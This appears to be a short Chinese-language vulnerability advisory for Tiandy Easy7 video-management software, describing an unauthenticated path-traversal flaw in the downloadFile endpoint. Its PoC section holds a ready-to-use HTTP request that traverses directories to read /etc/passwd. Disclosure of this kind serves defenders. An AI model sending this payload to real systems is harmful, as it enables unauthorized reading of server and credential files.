天地伟业 Easy7 /Easy7/rest/file/downloadFile 文件读取漏洞

2026-02-28 天地伟业Easy7 PoC Public

Description

天地伟业 Easy7 的/Easy7/rest/file/downloadFile接口对fileName参数未做安全过滤,攻击者可通过构造../路径穿越字符,无需登录即可读取服务器任意文件。

PoC

GET /Easy7/rest/file/downloadFile?fileName=/../../../../../../../../etc/passwd HTTP/1.1

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities